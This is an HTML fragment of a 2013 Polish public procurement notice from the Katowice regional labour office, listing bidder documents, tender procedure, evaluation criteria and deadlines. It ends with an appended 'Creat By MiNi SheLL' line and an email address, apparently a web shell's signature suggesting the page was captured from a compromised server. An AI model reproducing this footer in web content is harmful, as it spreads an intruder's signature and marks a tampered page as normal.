<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2) pkt 2. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 305- Kancelaria Urzędu, III piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.08.2013 godzina 11:00, miejsce: 3 Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 210- Kancelaria Urzędu, II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com